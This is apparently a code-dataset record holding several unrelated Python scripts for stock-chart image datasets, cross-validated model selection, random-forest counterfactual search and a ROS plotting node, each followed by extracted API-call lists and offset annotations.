#output_X is a series of price expressed in pixel
def rescale(input_X, pixel, min_x,max_x):
unit = (max_x - min_x)/pixel
output_X = round((input_X-min_x)/unit,0)
return output_X,unit
'''*************************************
#3. Go through the tickers
'''
for tkr in tkr_list:
print(tkr)
#if the ticker has been downloaded, skip the ticket and go for the next one
if os.path.exists(tkr+'6b1_completed.txt'):
continue
#download and create dataset
df =quandl.get_table('SHARADAR/SFP',date=date_dict,ticker=tkr)
#sort the date from ascending to descending...
df = df.sort_values(by=['date'])
df=df.reset_index(drop=True)
#charting interactive chart for viewing the data
if gen_plot == True:
trace = go.Candlestick(x=df.date,
open=df.open,
high=df.high,
low=df.low,
close=df.close)
data = [trace]
plotly.offline.plot(data, filename=tkr+'simple_candlestick')
#calculate mid price of the day
df['mid'] = (df['high'] + df['low'])/2
len_df = len(df)
num_img = max(int(len_df-window_size-1),0)
current_min_dte = df.date
train_shape = (num_img, pixel_size, window_size,num_channel)
label_shape = (num_img, pixel_size)
#remove the file if there is one
data_X_path = os.path.join(data_X_dir,tkr+'X_img.h5')
try:
os.remove(data_X_path)
except OSError:
pass
h5f_X = h5py.File(data_X_path,'w')
#remove the file if there is one
data_Y_path = os.path.join(data_Y_dir,tkr+'Y_label.h5')
try:
os.remove(data_Y_path)
except OSError:
pass
h5f_Y = h5py.File(data_Y_path,'w')
#create dataset within the HDF5 file
#now we create the dataset with a fixed size to fit all the data, it could also be create to fit fixed batches
h5f_X.create_dataset("X_img_ds", train_shape, np.float32)
h5f_Y.create_dataset("Y_label_ds", label_shape, np.float32)
#loop through the dates
for i in range(num_img):
img_ar = np.zeros((pixel_size,window_size,1))
result_Y =np.zeros((pixel_size))
df_plot = df.iloc[i:window_size+i,:]
#create min and max values for the mid price plot within a given timeframe
min_p = min(df_plot['mid'])
max_p = max(df_plot['mid'])
output_pixel,unit = rescale(df_plot['mid'],pixel_size,min_p,max_p)
df_next = df.iloc[window_size+i+1,:]
next_p = df_next['mid']
unit = max(unit,0.000001)
next_p_val = max(round((min(next_p,max_p)-min_p)/unit,0),0)
#in case of low liquidity ETF which has the same price, no graph be drawn
if min_p ==max_p:
continue
k = 0
#draw the dot on the x, y axis of the input image array
for pix in output_pixel:
img_ar[int(pix)-1][k][0] = 255
k+=1
#output the image for visualization
if img_output:
img = Image.fromarray(img_ar)
if img.mode != 'RGB':
new_img = img.convert('RGB')
file_path = os.path.join(folder_path,'img/'+tkr+str(i)+'.png')
new_img.save(file_path,"PNG")
img_row = img_ar/255
#draw the dot on the target image for training
result_Y[int(next_p_val)-1] = 255
result_Y_row=result_Y/255
#stack up for a numpy for Image Recognition
h5f_X["X_img_ds"][i, ...] = img_row
h5f_Y["Y_label_ds"][i, ...] = result_Y_row
if i == 0:
np_X = img_row
np_Y = result_Y_row
else:
np_X = np.vstack((np_X,img_row))
np_Y = np.vstack((np_Y,result_Y_row))
f_tkr=open(tkr+'6b1_completed.txt','w+')
f_tkr.close()
h5f_X.close()
h5f_Y.close()
#generate the message to the directory to signal the completion of this task
f=open('6b1_completed.txt','w+')
f.close()
|
[
"h5py.File",
"os.remove",
"os.path.dirname",
"os.path.exists",
"numpy.zeros",
"plotly.offline.plot",
"quandl.get_table",
"plotly.graph_objs.Candlestick",
"PIL.Image.fromarray",
"os.path.join",
"numpy.vstack"
] |
[((791, 816), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (806, 816), False, 'import os\n'), ((830, 866), 'os.path.join', 'os.path.join', (['folder_path', '"""dataset"""'], {}), "(folder_path, 'dataset')\n", (842, 866), False, 'import os\n'), ((879, 915), 'os.path.join', 'os.path.join', (['folder_path', '"""dataset"""'], {}), "(folder_path, 'dataset')\n", (891, 915), False, 'import os\n'), ((2563, 2604), 'os.path.exists', 'os.path.exists', (["(tkr + '6b1_completed.txt')"], {}), "(tkr + '6b1_completed.txt')\n", (2577, 2604), False, 'import os\n'), ((2667, 2727), 'quandl.get_table', 'quandl.get_table', (['"""SHARADAR/SFP"""'], {'date': 'date_dict', 'ticker': 'tkr'}), "('SHARADAR/SFP', date=date_dict, ticker=tkr)\n", (2683, 2727), False, 'import quandl\n'), ((3593, 3635), 'os.path.join', 'os.path.join', (['data_X_dir', "(tkr + 'X_img.h5')"], {}), "(data_X_dir, tkr + 'X_img.h5')\n", (3605, 3635), False, 'import os\n'), ((3718, 3745), 'h5py.File', 'h5py.File', (['data_X_path', '"""w"""'], {}), "(data_X_path, 'w')\n", (3727, 3745), False, 'import h5py\n'), ((3801, 3845), 'os.path.join', 'os.path.join', (['data_Y_dir', "(tkr + 'Y_label.h5')"], {}), "(data_Y_dir, tkr + 'Y_label.h5')\n", (3813, 3845), False, 'import os\n'), ((3928, 3955), 'h5py.File', 'h5py.File', (['data_Y_path', '"""w"""'], {}), "(data_Y_path, 'w')\n", (3937, 3955), False, 'import h5py\n'), ((2946, 3032), 'plotly.graph_objs.Candlestick', 'go.Candlestick', ([], {'x': 'df.date', 'open': 'df.open', 'high': 'df.high', 'low': 'df.low', 'close': 'df.close'}), '(x=df.date, open=df.open, high=df.high, low=df.low, close=df.\n close)\n', (2960, 3032), True, 'import plotly.graph_objs as go\n'), ((3184, 3246), 'plotly.offline.plot', 'plotly.offline.plot', (['data'], {'filename': "(tkr + 'simple_candlestick')"}), "(data, filename=tkr + 'simple_candlestick')\n", (3203, 3246), False, 'import plotly\n'), ((3650, 3672), 'os.remove', 'os.remove', (['data_X_path'], {}), '(data_X_path)\n', (3659, 3672), False, 'import os\n'), ((3860, 3882), 'os.remove', 'os.remove', (['data_Y_path'], {}), '(data_Y_path)\n', (3869, 3882), False, 'import os\n'), ((4325, 4363), 'numpy.zeros', 'np.zeros', (['(pixel_size, window_size, 1)'], {}), '((pixel_size, window_size, 1))\n', (4333, 4363), True, 'import numpy as np\n'), ((4380, 4400), 'numpy.zeros', 'np.zeros', (['pixel_size'], {}), '(pixel_size)\n', (4388, 4400), True, 'import numpy as np\n'), ((5262, 5285), 'PIL.Image.fromarray', 'Image.fromarray', (['img_ar'], {}), '(img_ar)\n', (5277, 5285), False, 'from PIL import Image\n'), ((5947, 5973), 'numpy.vstack', 'np.vstack', (['(np_X, img_row)'], {}), '((np_X, img_row))\n', (5956, 5973), True, 'import numpy as np\n'), ((5992, 6023), 'numpy.vstack', 'np.vstack', (['(np_Y, result_Y_row)'], {}), '((np_Y, result_Y_row))\n', (6001, 6023), True, 'import numpy as np\n')]
|
# PACKAGES
import numpy as np
import os
from scipy import stats as ss
import pickle
import h5py
import pandas as pd
from configs import *
path_to_results_folder = "%sresults/"%CV_save_path
path_to_preds_folder = "%spredictions/"%CV_save_path
path_to_final_chosen_models = "%sfinal_models_chosen/"%CV_save_path
if not os.path.isdir(path_to_final_chosen_models):
os.makedirs(path_to_final_chosen_models)
#### Compute test set variances
variances = {}
tmp_fname = os.listdir(path_to_preds_folder + "MTL/" + split_pca_dataset + "/")[0]
for variable in phenotypes:
vars_by_split = []
for fold_idx in range(25,30):
path_to_preds = path_to_preds_folder + "MTL/%s/%s/%d.h5"%(split_pca_dataset, tmp_fname, fold_idx)
with h5py.File(path_to_preds, 'r') as hf:
true_vals = hf["y_true"][variable][:]
vars_by_split.append(np.nanvar(true_vals))
variances[variable] = np.array(vars_by_split)
def MTL_get_CV_test_res_as_df(path_to_log_files):
firstfile = os.listdir(path_to_log_files)[0]
cols = pd.read_csv(path_to_log_files + firstfile).columns
test_runs = []
for i in range(5):
# the first 25 files are CV folds
cur_idx = 25+i
test_runs.append(pd.read_csv(path_to_log_files + "%d.log"%cur_idx))
test_overall_averages = pd.DataFrame(np.nanmean(np.array([test_runs[i].values for i in range(5)]),axis=0), columns=cols)
return test_runs, test_overall_averages
#################################################
############### MD-AD ##########################
#################################################
performances = {}
for var in phenotypes:
performances[var] = {}
for fname in os.listdir(path_to_results_folder + "MTL/" + split_pca_dataset):
test_runs, test_overall_avergaes = MTL_get_CV_test_res_as_df(path_to_results_folder + "MTL/" + split_pca_dataset + "/" + fname + "/")
performances[var][fname] = []
for foldidx in range(5):
# we want the min loss, and we scale by variance
test_var = variances[var][foldidx]
performances[var][fname].append(np.min(test_runs[foldidx]["val_%s_out_loss"%var])/test_var)
fnames = os.listdir(path_to_results_folder + "MTL/" + split_pca_dataset)
num_hy = len(fnames)
############ Choose final model within each CV split ##################
FOLD_performances = {}
for fold_idx in range(5):
FOLD_performances[fold_idx] = {}
for key1 in performances.keys():
FOLD_performances[fold_idx][key1] = []
for key2 in performances[key1].keys():
FOLD_performances[fold_idx][key1].append(performances[key1][key2][fold_idx])
FOLD_rankings = {}
for fold_idx in range(5):
FOLD_rankings[fold_idx] = {}
for phenotype in FOLD_performances[fold_idx].keys():
if np.sum(~np.isnan(FOLD_performances[fold_idx][phenotype])) == 0:
FOLD_rankings[fold_idx][phenotype] = np.zeros(num_hy)
continue
FOLD_rankings[fold_idx][phenotype] = ss.rankdata(FOLD_performances[fold_idx][phenotype])
FOLD_sum_of_ranks = {}
for fold_idx in range(5):
FOLD_sum_of_ranks[fold_idx] = np.zeros(num_hy)
for phenotype in FOLD_rankings[fold_idx].keys():
FOLD_sum_of_ranks[fold_idx] += FOLD_rankings[fold_idx][phenotype]
final_models_dict = {}
for fold_idx in range(5):
final_models_dict[25+fold_idx] = fnames[np.argmin(FOLD_sum_of_ranks[fold_idx])]
if not os.path.isdir(path_to_final_chosen_models + "MTL/"):
os.makedirs(path_to_final_chosen_models + "MTL/")
pickle.dump(final_models_dict, open( path_to_final_chosen_models+"MTL/folds.p", "wb" ) )
############ Choose final model overall (for retraining with all data) ##################
AVG_performances = {}
for key1 in performances.keys():
AVG_performances[key1] = {}
for key2 in performances[key1].keys():
AVG_performances[key1][key2] = np.nanmean(performances[key1][key2])
fnames_performances = {}
for phenotype in AVG_performances.keys():
fnames_performances[phenotype] = []
for fname in fnames:
fnames_performances[phenotype].append(AVG_performances[phenotype][fname])
fnames_rankings = {}
for phenotype in fnames_performances.keys():
fnames_rankings[phenotype] = ss.rankdata(fnames_performances[phenotype])
sum_of_ranks = np.zeros(len(fnames))
for phenotype in fnames_rankings.keys():
sum_of_ranks += fnames_rankings[phenotype]
pickle.dump(fnames[np.argmin(sum_of_ranks)], open( path_to_final_chosen_models+"MTL/final.p", "wb" ) )
#################################################
################ MLPs ##########################
#################################################
performances = {}
for var in phenotypes:
performances[var] = {}
for fname in os.listdir(path_to_results_folder + "MLP_baselines/" + split_pca_dataset):
test_runs, test_overall_avergaes = MTL_get_CV_test_res_as_df("%sMLP_baselines/%s/%s/%s/"%(path_to_results_folder,split_pca_dataset, fname,var))
performances[var][fname] = []
for foldidx in range(5):
# we want the min loss, and we scale by variance
test_performance = np.min(test_runs[foldidx]["val_loss"])/variances[var][foldidx]
performances[var][fname].append(test_performance)
############ Choose final model within each CV split ##################
FOLD_performances = {}
for fold_idx in range(5):
FOLD_performances[fold_idx] = {}
for key1 in performances.keys():
FOLD_performances[fold_idx][key1] = []
for key2 in performances[key1].keys():
FOLD_performances[fold_idx][key1].append(performances[key1][key2][fold_idx])
FOLD_rankings = {}
for fold_idx in range(5):
FOLD_rankings[fold_idx] = {}
for phenotype in FOLD_performances[fold_idx].keys():
if np.sum(~np.isnan(FOLD_performances[fold_idx][phenotype])) == 0:
FOLD_rankings[fold_idx][phenotype] = np.zeros(len(fnames))
continue
FOLD_rankings[fold_idx][phenotype] = ss.rankdata(FOLD_performances[fold_idx][phenotype])
final_models = {}
for fold_idx in range(5):
final_models[25+fold_idx] = {}
for phenotype in FOLD_rankings[fold_idx].keys():
final_models[25+fold_idx][phenotype] = fnames[np.argmin(FOLD_rankings[fold_idx][phenotype])]
if not os.path.isdir(path_to_final_chosen_models + "MLP_baselines/"):
os.makedirs(path_to_final_chosen_models + "MLP_baselines/")
pickle.dump(final_models, open( path_to_final_chosen_models+"MLP_baselines/folds.p", "wb" ) )
############ Choose final model overall (for retraining with all data) ##################
FOLD_sum_of_ranks = {}
for fold_idx in range(5):
FOLD_sum_of_ranks[fold_idx] = np.zeros(len(fnames))
for phenotype in FOLD_rankings[fold_idx].keys():
FOLD_sum_of_ranks[fold_idx] += FOLD_rankings[fold_idx][phenotype]
AVG_performances = {}
for key1 in performances.keys():
AVG_performances[key1] = {}
for key2 in performances[key1].keys():
AVG_performances[key1][key2] = np.nanmean(performances[key1][key2])
fnames_performances = {}
for phenotype in AVG_performances.keys():
fnames_performances[phenotype] = []
for fname in fnames:
fnames_performances[phenotype].append(AVG_performances[phenotype][fname])
fnames_rankings = {}
for phenotype in fnames_performances.keys():
fnames_rankings[phenotype] = ss.rankdata(fnames_performances[phenotype])
final_final_mlp_baselines = {}
for phenotype in fnames_rankings.keys():
final_final_mlp_baselines[phenotype]= fnames[np.argmin(fnames_rankings[phenotype])]
pickle.dump(final_final_mlp_baselines, open( path_to_final_chosen_models+"MLP_baselines/final.p", "wb" ) )
print("Saved selected hyperparameters to folder: %s"%path_to_final_chosen_models)
|
[
"h5py.File",
"os.makedirs",
"os.path.isdir",
"pandas.read_csv",
"numpy.zeros",
"scipy.stats.rankdata",
"numpy.argmin",
"numpy.isnan",
"numpy.min",
"numpy.array",
"numpy.nanvar",
"os.listdir",
"numpy.nanmean"
] |
[((2245, 2308), 'os.listdir', 'os.listdir', (["(path_to_results_folder + 'MTL/' + split_pca_dataset)"], {}), "(path_to_results_folder + 'MTL/' + split_pca_dataset)\n", (2255, 2308), False, 'import os\n'), ((324, 366), 'os.path.isdir', 'os.path.isdir', (['path_to_final_chosen_models'], {}), '(path_to_final_chosen_models)\n', (337, 366), False, 'import os\n'), ((372, 412), 'os.makedirs', 'os.makedirs', (['path_to_final_chosen_models'], {}), '(path_to_final_chosen_models)\n', (383, 412), False, 'import os\n'), ((484, 551), 'os.listdir', 'os.listdir', (["(path_to_preds_folder + 'MTL/' + split_pca_dataset + '/')"], {}), "(path_to_preds_folder + 'MTL/' + split_pca_dataset + '/')\n", (494, 551), False, 'import os\n'), ((928, 951), 'numpy.array', 'np.array', (['vars_by_split'], {}), '(vars_by_split)\n', (936, 951), True, 'import numpy as np\n'), ((1718, 1781), 'os.listdir', 'os.listdir', (["(path_to_results_folder + 'MTL/' + split_pca_dataset)"], {}), "(path_to_results_folder + 'MTL/' + split_pca_dataset)\n", (1728, 1781), False, 'import os\n'), ((3238, 3254), 'numpy.zeros', 'np.zeros', (['num_hy'], {}), '(num_hy)\n', (3246, 3254), True, 'import numpy as np\n'), ((3538, 3589), 'os.path.isdir', 'os.path.isdir', (["(path_to_final_chosen_models + 'MTL/')"], {}), "(path_to_final_chosen_models + 'MTL/')\n", (3551, 3589), False, 'import os\n'), ((3595, 3644), 'os.makedirs', 'os.makedirs', (["(path_to_final_chosen_models + 'MTL/')"], {}), "(path_to_final_chosen_models + 'MTL/')\n", (3606, 3644), False, 'import os\n'), ((4351, 4394), 'scipy.stats.rankdata', 'ss.rankdata', (['fnames_performances[phenotype]'], {}), '(fnames_performances[phenotype])\n', (4362, 4394), True, 'from scipy import stats as ss\n'), ((4876, 4949), 'os.listdir', 'os.listdir', (["(path_to_results_folder + 'MLP_baselines/' + split_pca_dataset)"], {}), "(path_to_results_folder + 'MLP_baselines/' + split_pca_dataset)\n", (4886, 4949), False, 'import os\n'), ((6479, 6540), 'os.path.isdir', 'os.path.isdir', (["(path_to_final_chosen_models + 'MLP_baselines/')"], {}), "(path_to_final_chosen_models + 'MLP_baselines/')\n", (6492, 6540), False, 'import os\n'), ((6546, 6605), 'os.makedirs', 'os.makedirs', (["(path_to_final_chosen_models + 'MLP_baselines/')"], {}), "(path_to_final_chosen_models + 'MLP_baselines/')\n", (6557, 6605), False, 'import os\n'), ((7589, 7632), 'scipy.stats.rankdata', 'ss.rankdata', (['fnames_performances[phenotype]'], {}), '(fnames_performances[phenotype])\n', (7600, 7632), True, 'from scipy import stats as ss\n'), ((1029, 1058), 'os.listdir', 'os.listdir', (['path_to_log_files'], {}), '(path_to_log_files)\n', (1039, 1058), False, 'import os\n'), ((1073, 1115), 'pandas.read_csv', 'pd.read_csv', (['(path_to_log_files + firstfile)'], {}), '(path_to_log_files + firstfile)\n', (1084, 1115), True, 'import pandas as pd\n'), ((3093, 3144), 'scipy.stats.rankdata', 'ss.rankdata', (['FOLD_performances[fold_idx][phenotype]'], {}), '(FOLD_performances[fold_idx][phenotype])\n', (3104, 3144), True, 'from scipy import stats as ss\n'), ((3481, 3519), 'numpy.argmin', 'np.argmin', (['FOLD_sum_of_ranks[fold_idx]'], {}), '(FOLD_sum_of_ranks[fold_idx])\n', (3490, 3519), True, 'import numpy as np\n'), ((3999, 4035), 'numpy.nanmean', 'np.nanmean', (['performances[key1][key2]'], {}), '(performances[key1][key2])\n', (4009, 4035), True, 'import numpy as np\n'), ((4549, 4572), 'numpy.argmin', 'np.argmin', (['sum_of_ranks'], {}), '(sum_of_ranks)\n', (4558, 4572), True, 'import numpy as np\n'), ((6185, 6236), 'scipy.stats.rankdata', 'ss.rankdata', (['FOLD_performances[fold_idx][phenotype]'], {}), '(FOLD_performances[fold_idx][phenotype])\n', (6196, 6236), True, 'from scipy import stats as ss\n'), ((7229, 7265), 'numpy.nanmean', 'np.nanmean', (['performances[key1][key2]'], {}), '(performances[key1][key2])\n', (7239, 7265), True, 'import numpy as np\n'), ((7759, 7796), 'numpy.argmin', 'np.argmin', (['fnames_rankings[phenotype]'], {}), '(fnames_rankings[phenotype])\n', (7768, 7796), True, 'import numpy as np\n'), ((759, 788), 'h5py.File', 'h5py.File', (['path_to_preds', '"""r"""'], {}), "(path_to_preds, 'r')\n", (768, 788), False, 'import h5py\n'), ((876, 896), 'numpy.nanvar', 'np.nanvar', (['true_vals'], {}), '(true_vals)\n', (885, 896), True, 'import numpy as np\n'), ((1257, 1308), 'pandas.read_csv', 'pd.read_csv', (["(path_to_log_files + '%d.log' % cur_idx)"], {}), "(path_to_log_files + '%d.log' % cur_idx)\n", (1268, 1308), True, 'import pandas as pd\n'), ((3001, 3017), 'numpy.zeros', 'np.zeros', (['num_hy'], {}), '(num_hy)\n', (3009, 3017), True, 'import numpy as np\n'), ((6424, 6469), 'numpy.argmin', 'np.argmin', (['FOLD_rankings[fold_idx][phenotype]'], {}), '(FOLD_rankings[fold_idx][phenotype])\n', (6433, 6469), True, 'import numpy as np\n'), ((5267, 5305), 'numpy.min', 'np.min', (["test_runs[foldidx]['val_loss']"], {}), "(test_runs[foldidx]['val_loss'])\n", (5273, 5305), True, 'import numpy as np\n'), ((2149, 2200), 'numpy.min', 'np.min', (["test_runs[foldidx]['val_%s_out_loss' % var]"], {}), "(test_runs[foldidx]['val_%s_out_loss' % var])\n", (2155, 2200), True, 'import numpy as np\n'), ((2896, 2944), 'numpy.isnan', 'np.isnan', (['FOLD_performances[fold_idx][phenotype]'], {}), '(FOLD_performances[fold_idx][phenotype])\n', (2904, 2944), True, 'import numpy as np\n'), ((5983, 6031), 'numpy.isnan', 'np.isnan', (['FOLD_performances[fold_idx][phenotype]'], {}), '(FOLD_performances[fold_idx][phenotype])\n', (5991, 6031), True, 'import numpy as np\n')]
|
import numpy as np
import pandas as pd
import copy
import scipy.stats
from sklearn.metrics import mean_squared_error
from sklearn.ensemble import RandomForestRegressor
"""
define basic functions for AFT1
"""
def search_path(estimator, y_threshold):
"""
return path index list containing
[{leaf node id, inequality symbol, threshold, feature index}].
estimator: decision tree
maxj: the number of selected leaf nodes
"""
""" select leaf nodes whose outcome is aim_label """
# information of left child node
children_left = estimator.tree_.children_left
children_right = estimator.tree_.children_right
feature = estimator.tree_.feature
threshold = estimator.tree_.threshold
# leaf nodes ID
leaf_nodes = np.where(children_left == -1)[0]
leaf_nodes = [
i for i in leaf_nodes if estimator.tree_.value[i] >= y_threshold]
""" search the path to the selected leaf node """
paths = {}
for leaf_node in leaf_nodes:
""" correspond leaf node to left and right parents """
child_node = leaf_node
parent_node = -100 # initialize
parents_left = [] # 左側親ノード
parents_right = [] # 右側親ノード
while (parent_node != 0):
if (np.where(children_left == child_node)[0].shape == (0, )):
parent_left = -1 # 左側親ノードが存在しない場合は-1
parent_right = np.where(
children_right == child_node)[0][0]
parent_node = parent_right
elif (np.where(children_right == child_node)[0].shape == (0, )):
parent_right = -1 # 右側親ノードが存在しない場合は-1
parent_left = np.where(children_left == child_node)[0][0]
parent_node = parent_left
parents_left.append(parent_left)
parents_right.append(parent_right)
""" for next step """
child_node = parent_node
# nodes dictionary containing left parents and right parents
paths[leaf_node] = (parents_left, parents_right)
path_info = {}
for i in paths:
node_ids = [] # node ids used in the current node
# inequality symbols used in the current node
inequality_symbols = []
thresholds = [] # thretholds used in the current node
features = [] # features used in the current node
parents_left, parents_right = paths[i]
for idx in range(len(parents_left)):
if (parents_left[idx] != -1):
""" the child node is the left child of the parent """
node_id = parents_left[idx] # node id
node_ids.append(node_id)
inequality_symbols.append(0)
thresholds.append(threshold[node_id])
features.append(feature[node_id])
elif (parents_right[idx] != -1):
""" the child node is the right child of the parent """
node_id = parents_right[idx]
node_ids.append(node_id)
inequality_symbols.append(1)
thresholds.append(threshold[node_id])
features.append(feature[node_id])
path_info[i] = {'node_id': node_ids[::-1],
'inequality_symbol': inequality_symbols[::-1],
'threshold': thresholds[::-1],
'feature': features[::-1]}
return path_info
def esatisfactory_instance(x, epsilon, path_info):
"""
return the epsilon satisfactory instance of x.
"""
esatisfactory = copy.deepcopy(x)
for feature_idx in np.unique(path_info['feature']):
""" loop by each feature -- i is feature index (feature name). """
positions = np.where(np.array(path_info['feature'])==feature_idx)[0] # positions of path_information list
theta_upp = float('inf')
theta_low = -float('inf')
for posi in positions:
if path_info['inequality_symbol'][posi]==0:
""" posiが大きいほど厳しい条件になるので,順番に更新していくだけで良い """
theta_upp = path_info['threshold'][posi] # upper bounded threshold
elif path_info['inequality_symbol'][posi]==1:
theta_low = path_info['threshold'][posi] # lower bounded threshold
if theta_low == -float('inf'):
esatisfactory[feature_idx] = theta_upp - epsilon
elif theta_upp == float('inf'):
esatisfactory[feature_idx] = theta_low + epsilon
else:
esatisfactory[feature_idx] = (theta_low + theta_upp)/2
return esatisfactory
def transam(ensemble_regressor, x, y_threshold, epsilon, cost_func):
"""
x: feature vector
y_threshold: threshold value to select the positive path
"""
""" initialize """
x_out = copy.deepcopy(x) # initialize output
delta_mini = 10**3 # initialize cost
check_cnt = 0 # check whether epsilon satisfactory instance is updated
for estimator in ensemble_regressor:
if (ensemble_regressor.predict(x.reshape(1, -1)) < y_threshold
and estimator.predict(x.reshape(1, -1)) < y_threshold):
paths_info = search_path(estimator, y_threshold)
for key in paths_info:
""" generate epsilon-satisfactory instance """
path_info = paths_info[key]
es_instance = esatisfactory_instance(x, epsilon, path_info)
if ensemble_regressor.predict(es_instance.reshape(1, -1)) > y_threshold:
if cost_func(x, es_instance) < delta_mini:
x_out = es_instance
delta_mini = cost_func(x, es_instance)
check_cnt += 1 # add update counter
else:
continue
return x_out
|
[
"copy.deepcopy",
"numpy.where",
"numpy.array",
"numpy.unique"
] |
[((3546, 3562), 'copy.deepcopy', 'copy.deepcopy', (['x'], {}), '(x)\n', (3559, 3562), False, 'import copy\n'), ((3586, 3617), 'numpy.unique', 'np.unique', (["path_info['feature']"], {}), "(path_info['feature'])\n", (3595, 3617), True, 'import numpy as np\n'), ((4761, 4777), 'copy.deepcopy', 'copy.deepcopy', (['x'], {}), '(x)\n', (4774, 4777), False, 'import copy\n'), ((758, 787), 'numpy.where', 'np.where', (['(children_left == -1)'], {}), '(children_left == -1)\n', (766, 787), True, 'import numpy as np\n'), ((3723, 3753), 'numpy.array', 'np.array', (["path_info['feature']"], {}), "(path_info['feature'])\n", (3731, 3753), True, 'import numpy as np\n'), ((1244, 1281), 'numpy.where', 'np.where', (['(children_left == child_node)'], {}), '(children_left == child_node)\n', (1252, 1281), True, 'import numpy as np\n'), ((1387, 1425), 'numpy.where', 'np.where', (['(children_right == child_node)'], {}), '(children_right == child_node)\n', (1395, 1425), True, 'import numpy as np\n'), ((1514, 1552), 'numpy.where', 'np.where', (['(children_right == child_node)'], {}), '(children_right == child_node)\n', (1522, 1552), True, 'import numpy as np\n'), ((1658, 1695), 'numpy.where', 'np.where', (['(children_left == child_node)'], {}), '(children_left == child_node)\n', (1666, 1695), True, 'import numpy as np\n')]
|
#!/usr/bin/env python2
from __future__ import print_function
import roslib
import sys
import rospy
import numpy as np
import datetime
import time
import os
import pickle
from geometry_msgs.msg import PoseArray
from geometry_msgs.msg import Pose
from geometry_msgs.msg import PoseWithCovariance
from std_msgs.msg import Bool
from nav_msgs.msg import Odometry
from dse_msgs.msg import PoseMarkers
from std_msgs.msg import Float64MultiArray
from std_msgs.msg import MultiArrayLayout
from std_msgs.msg import MultiArrayDimension
from dse_msgs.msg import InfFilterResults
from visualization_msgs.msg import Marker
from scipy.spatial.transform import Rotation as R
from gazebo_msgs.msg import LinkStates
import tf_conversions
import tf2_ros
import matplotlib.pyplot as plt
import gazebo_lib
import dse_lib
import dse_constants
roslib.load_manifest('dse_simulation')
class information_filter:
# Define initial/setup values
def __init__(self):
self.time = []
self.true_poses = []
self.est_poses = []
self.est_covariances = []
# # Get parameters from launch file
# self.ros_prefix = rospy.get_param('~prefix')
# if len(self.ros_prefix) != 0 and self.ros_prefix[0] != '/':
# self.ros_prefix = '/' + self.ros_prefix
# self.tf_pretix = self.ros_prefix[1:]
# self.dim_state = rospy.get_param('~dim_state')
# Get parameters from launch file
# self.n_params = 3
# self.dim_state = 6
# self.object_names = ['tb3_0', 'tb3_1', 'tb3_2']
# self.object_ids = [5, 6, 7]
# self.agent_ids = [5, 6, 7]
# self.dim_state = 6
self.object_names = rospy.get_param('~objects')
self.object_ids = rospy.get_param('~object_ids')
self.agent_ids = rospy.get_param('~agent_ids')
self.dim_state = rospy.get_param('~dim_state', 6)
n_params = len(self.agent_ids)
self.store_data_sub = rospy.Subscriber('/store_data', Bool, self.store_data)
self.gazebo_model_object = gazebo_lib.GazeboModel(self.object_names)
self.inf_results_subs = []
self.agent_names = []
for i in range(n_params):
index = self.object_ids.index(self.agent_ids[i])
self.agent_names.append(self.object_names[index])
if len(self.agent_names[i]) != 0 and self.agent_names[i][0] != '/':
self.agent_names[i] = '/' + self.agent_names[i]
self.inf_results_subs.append(rospy.Subscriber(
self.agent_names[i] + "/dse/inf/results", InfFilterResults, self.results_callback, i))
self.time.append([])
self.true_poses.append([])
self.est_poses.append([])
self.est_covariances.append([])
if self.dim_state == 6:
self.dim_obs = 3
elif self.dim_state == 12:
self.dim_obs = 6
else:
rospy.signal_shutdown('invalid state dimension passed in')
# Create pose_array for the information results
def results_callback(self, data, agent_index):
inf_id_list = np.array(data.ids)
inf_Y = dse_lib.multi_array_2d_output(data.inf_matrix)
inf_y = dse_lib.multi_array_2d_output(data.inf_vector)
self.inf_x = np.linalg.inv(inf_Y).dot(inf_y)
inf_P = np.linalg.inv(inf_Y)
est_pose = []
true_pose = []
est_covariance = []
for id in inf_id_list:
name_index = self.object_ids.index(id)
name = self.object_names[name_index]
i = np.where(inf_id_list == id)[0][0]
i_min = i * self.dim_state
i_max = i_min + self.dim_state
this_pose = dse_lib.pose_from_state_3D(self.inf_x[i_min:i_max])
this_xyy = dse_lib.state_to_xyzypr(dse_lib.state_from_pose_3D(this_pose))
# if this_xyy[2] - 1.5707633 < 0.0001:
# print('weird error')
est_pose.append(this_xyy)
cov = dse_lib.sub_matrix(inf_P, inf_id_list, id, self.dim_state)
cov = dse_lib.state_cov_to_covariance_matrix(cov)
est_covariance.append(cov)
this_pose = self.gazebo_model_object.get_model_pose(name)
this_xyy = dse_lib.state_to_xyzypr(dse_lib.state_from_pose_3D(this_pose))
true_pose.append(this_xyy)
if len(self.est_poses[agent_index]) > 1 and np.linalg.norm(np.array(est_pose) - self.est_poses[agent_index][-1]) > 1:
print('error')
# for est in est_pose:
# if np.allclose(est, [-2, 0, np.pi/2]) or np.allclose(est, [0, 0, np.pi/2]) or np.allclose(est, [2, 0, np.pi/2]):
# print('error')
time = rospy.Time.now().secs + rospy.Time.now().nsecs / 1000000000
self.time[agent_index].append(time)
self.true_poses[agent_index].append(np.array(true_pose))
self.est_poses[agent_index].append(np.array(est_pose))
# if est_pose[1][2] - 1.5707633 < 0.0001:
# print('weird error')
self.est_covariances[agent_index].append(est_covariance)
def store_data(self, data):
if data.data:
time_np = []
true_poses_np = []
est_poses_np = []
est_covariances_np = []
for i in range(len(self.agent_ids)):
time_np.append(np.array(self.time[i]))
true_poses_np.append(np.array(self.true_poses[i]))
est_poses_np.append(np.array(self.est_poses[i]))
est_covariances_np.append(np.array(self.est_covariances[i]))
header = '[header, time, object_ids, object_names, agent_names, agent_ids, true_poses, est_poses, est_covariances]'
cal = [header, time_np, self.object_ids, self.object_names, self.agent_names, self.agent_ids,
true_poses_np, est_poses_np, est_covariances_np]
dump_file = "simulation_data_" + str(rospy.Time.now()) + ".p"
pickle.dump(cal, open(os.path.join(sys.path[0], dump_file), "wb"))
def main(args):
rospy.init_node('dse_plotting_node', anonymous=True)
imf = information_filter()
try:
rospy.spin()
except KeyboardInterrupt:
print("Shutting down")
if __name__ == '__main__':
main(sys.argv)
|
[
"dse_lib.pose_from_state_3D",
"dse_lib.sub_matrix",
"rospy.Subscriber",
"rospy.Time.now",
"os.path.join",
"dse_lib.state_from_pose_3D",
"rospy.signal_shutdown",
"rospy.get_param",
"roslib.load_manifest",
"numpy.where",
"numpy.array",
"rospy.init_node",
"numpy.linalg.inv",
"rospy.spin",
"gazebo_lib.GazeboModel",
"dse_lib.multi_array_2d_output",
"dse_lib.state_cov_to_covariance_matrix"
] |
